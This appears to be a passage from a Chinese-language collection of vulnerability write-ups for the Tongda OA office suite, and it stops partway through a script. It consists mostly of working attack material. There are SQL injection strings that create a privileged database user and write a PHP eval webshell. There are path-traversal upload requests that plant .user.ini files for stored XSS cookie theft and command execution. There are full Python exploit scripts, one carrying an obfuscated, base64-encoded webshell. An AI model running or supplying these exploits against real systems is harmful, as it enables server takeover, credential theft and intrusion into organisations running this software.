select if((substr(user(),1,1)='r'),1,power(9999,99)) # 当字符相等时,不报错,错误时报错
```
![image-20220209111011701](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091110796.png)
![image-20220209111026602](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091110677.png)
添加SQL数据库用户
```sql
grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION
```
访问 **http://xxx.xxx.xxx.xxx/general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql. *TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION*
进入 **Myoa/mysql5/bin** 目录 执行 **mysql -upeiqi -p** 输入密码查询所有用户
![image-20220209111049110](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091110154.png)
发现成功执行添加一个账户
然后该用户是对mysql数据库拥有所有权限的,然后给自己加权限:
```sql
UPDATE `mysql`.`user` SET `Password` = '*FBCFBB73CF21D4F464A95E775B40AF27A679CD2D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('peiqi' AS Binary(5));
```
![image-20220209111109474](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091111720.png)
然后用注入点刷新权限,因为该用户是没有刷新权限的权限的:`general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;`这样就拥有了所有权限
![image-20220209111122226](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091111343.png)
登录如果失败,执行
```sql
grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION
```
利用漏洞写shell
```sql
# 查路径:
select @@basedir; # F:\OA\mysql5\那么web目录就是 F:/OA/webroot/
# 方法1
set global slow_query_log=on;
set global slow_query_log_file='F:/OA/webroot/';
select '<?php eval($_POST[x]);?>' or sleep(11);
# 方法2
set global general_log = on;
set global general_log_file = 'F:/OA/webroot/';
select '<?php eval($_POST[x]);?>';
show variables like '%general%';
```
上传大马
![image-20220209111135417](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091111491.png)
## 参考文章
[通达OA v11.7后台SQL注入到RCE[0day\]](https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw)

267
OA产品漏洞/通达OA v11.8 update.php 后台文件包含XSS漏洞.md Normal file
View File

@ -0,0 +1,267 @@
# 通达OA v11.8 update.php 后台文件包含XSS漏洞
## 漏洞描述
通达OA v11.8以下存在文件上传接口,可上传 .user.ini 文件包含有xss语句的文件使管理员后台文件均包含XSS语句被攻击者获取敏感信息
## 漏洞影响
```
通达OA < v11.8
```
## 环境搭建
[通达OA v11.6下载链接](https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe)
下载完毕点击安装即可
## 漏洞复现
这里使用的环境为通达 v11.6版本v11.6版本中的漏洞利用较好,在 v11.7 后续版本中规定了上传路径导致XSS利用会比较困难
出现漏洞的文件为 **webroot/general/hr/manage/staff_info/update.php**
```php
<?php
include_once "inc/auth.inc.php";
include_once "inc/utility_all.php";
include_once "inc/utility_file.php";
include_once "inc/utility_field.php";
include_once "inc/utility_cache.php";
include_once "general/system/log/annual_leave_log.php";
if (strstr($BYNAME, "/") || strstr($BYNAME, "\\") || strstr($BYNAME, "..")) {
Message(_("错误"), _("OA用户名包含非法字符"));
exit();
}
include_once "inc/header.inc.php";
echo "\r\n<body class=\"bodycolor\">\r\n";
echo "\r\n<body class=\"bodycolor\">\r\n";
$PHOTO_NAME0 = $_FILES["ATTACHMENT"]["name"];
$ATTACHMENT = $_FILES["ATTACHMENT"]["tmp_name"];
if ($PHOTO_NAME0 != "") {
$FULL_PATH = MYOA_ATTACH_PATH . "hrms_pic";
if (!file_exists($FULL_PATH)) {
@mkdir($FULL_PATH, 448);
}
$PHOTO_NAME = $USER_ID . substr($PHOTO_NAME0, strrpos($PHOTO_NAME0, "."));
$FILENAME = MYOA_ATTACH_PATH . "hrms_pic/" . $PHOTO_NAME;
td_copy($ATTACHMENT, $FILENAME);
if (file_exists($ATTACHMENT)) {
unlink($ATTACHMENT);
}
if (!file_exists($FILENAME)) {
Message(_("附件上传失败"), _("原因附件文件为空或文件名太长或附件大于30兆字节或文件路径不存在"));
Button_Back();
exit();
}
}
```
![image-20220209111308741](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091113931.png)
在这里参数 **$USER_ID** 是可控的,并且无过滤危险符号就拼接进去了,那我们传入 **../../../** 我们就可以任意文件上传了
由于通达OA 的文件上传限制的死死的,所以我们可以通过利用 PHP的 **.user.ini** 文件来包含其他文件这里是可以用于包含XSS语句的文件的所以我们上传文件
内容为
```plain
auto_prepend_file=test.log
```
我们想要最大化利用可以上传在**首页或者管理员** 界面,利用自定义弹窗来渗透
这里对管理员页面 **general** 目录上传
请求包为
```plain
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/.user HTTP/1.1
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Content-Length: 365
Connection: close
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=kqfgar7u3c0ang0es41u3u67p4; SID_1=a63eb31
Upgrade-Insecure-Requests: 1
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="peiqi.ini"
Content-Type: text/plain
auto_prepend_file=peiqi.log
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"
提交
-----------------------------17518323986548992951984057104--
```
其中 **USER_ID=../../general/.user** 为上传路径
```plain
Content-Disposition: form-data; name="ATTACHMENT"; filename="peiqi.ini"
Content-Type: text/plain
auto_prepend_file=peiqi.log
```
这里拼接后上传就变成了 **.user.ini**
![image-20220209111339894](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091113999.png)
这里再上传 XSS文件 **peiqi.log** 被包含进去
![image-20220209111358294](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091113385.png)
上传后每次管理员登录后都会带着Cookie请求一次XSS平台
![image-20220209111423483](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091114571.png)
钓鱼什么的代码写在peiqi.log文件里就好啦
刚刚提到了 v11.7版本不方便利用,这是因为在后续版本加上了文件上传的规定路径
![image-20220209111524536](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091115646.png)
```php
if ((strpos($source, "webroot") !== false) && (strpos($source, "attachment") === false)) {
return false;
}
else {
return true;
}
```
路径中必须要包含 **webroot 和 attachment** 才可以上传
![image-20220209111502133](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091115242.png)
这里XSS的利用点有4个文件夹其中最有几率XSS的为**存储目录管理的文件夹**
![image-20220209111547012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091115069.png)
用同样的方法上传利用文件每次当管理员设置时就会盗取Cookie
## 漏洞POC
因为是xss可能对目标有影响所以这里POC在一个不常用目录探测是否存在漏洞
Cookie填写访问后台时的Cookie, 其中的base64解码更改 PeiQi_Wiki为 自己的XSS语句
v11.6及以下 攻击 /general 和 /general/system/attachment 目录较好
v11.6以上 攻击 /general/system/attachment 目录较好
```python
import requests
import sys
import random
import re
import base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: 通达OA < V11.8 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mCookie >>> xxxxxxxxxxxxxxxxxxxxxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/.user"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkuaW5pIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCmF1dG9fcHJlcGVuZF9maWxlPXBlaXFpLmxvZwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQ==")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传.user.ini文件, \033[0m".format(target_url))
POC_2(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传.user.ini文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/test"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkubG9nIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KClBlaVFpX1dpa2kKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/test \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传 test.log 文件, \033[0m".format(target_url))
POC_3(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传 test.log 文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, Cookie):
vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?test=test"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie": Cookie,
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?test=test \033[0m".format(target_url))
if "test_Wiki" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 存在漏洞,响应中包含 test_Wiki,存在XSS漏洞, 可参考文章写的利用版本进一步攻击 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞,响应中不包含 test_Wiki\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
Cookie = "USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=kqfgar7u3c0ang0es41u3u67p4; SID_1=a63eb31"
POC_1(target_url, Cookie)
```
![image-20220209111615822](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091116959.png)
## 参考文章
https://paper.seebug.org/1499/

340
OA产品漏洞/通达OA v11.8 update.php 后台文件包含命令执行漏洞.md Normal file
View File

@ -0,0 +1,340 @@
# 通达OA v11.8 update.php 后台文件包含命令执行漏洞
## 漏洞描述
通达OA v11.8以下存在文件上传接口,可上传 .user.ini 文件包含有PHP语句的文件导致命令执行
## 漏洞影响
```
通达OA < v11.8
```
## 环境搭建
[通达OA v11.6下载链接](https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe)
下载完毕点击安装即可
## 漏洞复现
这里使用的环境为通达 v11.6版本
出现漏洞的文件为 **webroot/general/hr/manage/staff_info/update.php**
```php
<?php
include_once "inc/auth.inc.php";
include_once "inc/utility_all.php";
include_once "inc/utility_file.php";
include_once "inc/utility_field.php";
include_once "inc/utility_cache.php";
include_once "general/system/log/annual_leave_log.php";
if (strstr($BYNAME, "/") || strstr($BYNAME, "\\") || strstr($BYNAME, "..")) {
Message(_("错误"), _("OA用户名包含非法字符"));
exit();
}
include_once "inc/header.inc.php";
echo "\r\n<body class=\"bodycolor\">\r\n";
echo "\r\n<body class=\"bodycolor\">\r\n";
$PHOTO_NAME0 = $_FILES["ATTACHMENT"]["name"];
$ATTACHMENT = $_FILES["ATTACHMENT"]["tmp_name"];
if ($PHOTO_NAME0 != "") {
$FULL_PATH = MYOA_ATTACH_PATH . "hrms_pic";
if (!file_exists($FULL_PATH)) {
@mkdir($FULL_PATH, 448);
}
$PHOTO_NAME = $USER_ID . substr($PHOTO_NAME0, strrpos($PHOTO_NAME0, "."));
$FILENAME = MYOA_ATTACH_PATH . "hrms_pic/" . $PHOTO_NAME;
td_copy($ATTACHMENT, $FILENAME);
if (file_exists($ATTACHMENT)) {
unlink($ATTACHMENT);
}
if (!file_exists($FILENAME)) {
Message(_("附件上传失败"), _("原因附件文件为空或文件名太长或附件大于30兆字节或文件路径不存在"));
Button_Back();
exit();
}
}
```
![image-20220209111844985](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091118195.png)
在这里参数 **$USER_ID** 是可控的,并且无过滤危险符号就拼接进去了,那我们传入 **../../../** 我们就可以任意文件上传了
由于通达OA 的文件上传限制的死死的,所以我们可以通过利用 PHP的 **.user.ini** 文件来包含其他文件这里是可以用于包含PHP语句的文件的所以我们上传文件内容为
```plain
auto_prepend_file=peiqi.log
```
请求包为
```plain
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user HTTP/1.1
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Content-Length: 365
Connection: close
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=kqfgar7u3c0ang0es41u3u67p4; SID_1=a63eb31
Upgrade-Insecure-Requests: 1
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="peiqi.ini"
Content-Type: text/plain
auto_prepend_file=peiqi.log
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"
提交
-----------------------------17518323986548992951984057104--
```
其中 **USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user** 为上传路径
关于更多原理参考 http://wiki.peiqi.tech 中的另一篇 通达OA v11.8 后台文件包含存储型XSS漏洞
这里我们简单知道了上传方式,那我们就通过 **.user.ini文件** 包含恶意文件
![image-20220209111908637](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091119726.png)
现在已经成功上传了恶意文件
访问 http://xxx.xxx.xxx.xxx/general/reportshop/workshop/report/attachment-remark/form.inc.php?peiqi=ipconfig 文件包含命令执行
![image-20220209111927060](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091119206.png)
在 v11.6中 上传的位置并没有限定所以可以上传在方便访问的目录(不需要登录)
而 v11.8中则有目录名的限制需要目录带有 webroot 和 attachment
![image-20220209112005410](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091120519.png)
![image-20220209112022434](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091120543.png)
## 漏洞POC
脚本在 v11.6 测试成功执行, 在 v11.6以上执行时 这个webshell无法执行命令
v11.7 v11.8可用蚁剑插件绕过连接webshell
```python
import requests
import sys
import random
import re
import base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: 通达OA < V11.8 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mCookie >>> xxxxxxxxxxxxxxxxxxxxxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/.user"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0idGVzdC5pbmkiCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbgoKYXV0b19wcmVwZW5kX2ZpbGU9dGVzdC5sb2cKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传.user.ini文件, \033[0m".format(target_url))
POC_2(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传.user.ini文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/test"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0idGVzdC5sb2ciCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbgoKPD9waHAgCmVjaG8gInRlc3RfV2lraSI7CiRwemtCPWNyZWF0ZV9mdW5jdGlvbihjaHIoMDEwMTc1MC8wMTY1MikuYmFzZTY0X2RlY29kZSgnY3c9PScpLmJhc2U2NF9kZWNvZGUoJ2J3PT0nKS5jaHIoOTkwODEvOTA5KS5jaHIoMDEwMjUtMDY2MCksY2hyKDA1MTctMDM1MikuY2hyKDB4MzQzLTB4MmNkKS5iYXNlNjRfZGVjb2RlKCdZUT09Jykuc3RyX3JvdDEzKCd5JykuYmFzZTY0X2RlY29kZSgnS0E9PScpLmJhc2U2NF9kZWNvZGUoJ0pBPT0nKS5jaHIoNDQ0LTMyOSkuYmFzZTY0X2RlY29kZSgnYnc9PScpLmNocig1OTctNDg4KS5jaHIoMHgxOWYtMHgxM2EpLmNocigyMTktMTc4KS5iYXNlNjRfZGVjb2RlKCdPdz09JykpOyRwemtCKGJhc2U2NF9kZWNvZGUoJ05EZzFOJy4nemMyTzAnLidCbGRrRicuJ3NLQ1JmJy4nJy5jaHIoODIxMTAvOTY2KS5iYXNlNjRfZGVjb2RlKCdSUT09Jykuc3RyX3JvdDEzKCc5JykuY2hyKDAxNTUwNjQvMDEyMzEpLmJhc2U2NF9kZWNvZGUoJ1ZnPT0nKS4nJy4nJy5zdHJfcm90MTMoJ1MnKS5iYXNlNjRfZGVjb2RlKCdkQT09JykuYmFzZTY0X2RlY29kZSgnTUE9PScpLmNocig2MDc1MC82NzUpLmNocigwMTUwNy0wMTM1NykuJycuJ04wWFNrJy4nN01UUTEnLidOek15TycuJ0RzPScuJycpKTs/PgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQo=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/test \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传 test.log 文件, \033[0m".format(target_url))
POC_3(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传 test.log 文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, Cookie):
vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie": Cookie,
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php? \033[0m".format(target_url))
if "test_Wiki" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 存在漏洞,响应中包含 test_Wiki \033[0m".format(target_url))
print("\033[32m[o] 成功上传蚁剑木马 密码为: test \n[o] webshell路径: {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?\033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞,响应中不包含 test_Wiki\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
Cookie = "PHPSESSID=ug4ip8ohugo61bmu399npplep5; USER_NAME_COOKIE=admin; OA_USER_ID=admin"
POC_1(target_url, Cookie)
```
![image-20220209112046258](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091120453.png)
v11.8及以下可连接蚁剑生成的webshell控制,且生成后不需要管理员Cookie即可连接
```python
import requests
import sys
import random
import re
import base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 通达OA < V11.8 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mCookie >>> xxxxxxxxxxxxxxxxxxxxxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/.user"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
